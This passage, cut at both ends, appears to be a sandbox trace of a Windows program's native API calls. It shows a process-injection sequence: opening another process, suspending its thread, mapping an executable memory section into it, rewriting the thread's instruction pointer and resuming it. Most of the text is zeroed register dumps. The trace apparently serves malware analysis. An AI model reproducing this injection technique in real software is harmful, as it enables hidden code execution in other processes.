[221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.276] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.276] NtClose (Handle=0xb4) returned 0x0 [0167.276] NtClose (Handle=0x138) returned 0x0 [0167.278] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x3c8, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0167.278] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.278] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.278] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x5c3000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.278] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.282] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x378) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0167.282] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.282] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21a0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.294] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x5c3000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.296] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.297] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xfa200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xfb000) returned 0x0 [0167.304] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xfa200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x600000, SectionOffset=0x0, ViewSize=0xde6e8*=0xfb000) returned 0x0 [0167.325] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.354] NtClose (Handle=0x140) returned 0x0 [0167.354] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x5c3000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x667707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.364] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.364] NtClose (Handle=0x138) returned 0x0 [0167.364] NtClose (Handle=0xb4) returned 0x0 [0167.366] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xdcc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0167.366] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.366] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.366] NtReadVirtualMemory (in: 